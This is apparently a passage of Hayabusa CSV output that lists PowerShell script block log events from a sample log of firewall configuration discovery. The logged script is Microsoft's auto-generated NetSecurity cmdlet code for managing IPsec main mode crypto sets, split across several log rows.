$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeCryptoSet' function Set-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object 
$script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 
'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (c",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.989 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"dxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} 
} else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeCryptoSet' function Remove-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, 
[Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.Paramete",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.989 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"rSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 
'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeCryptoSet' function Rename-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, 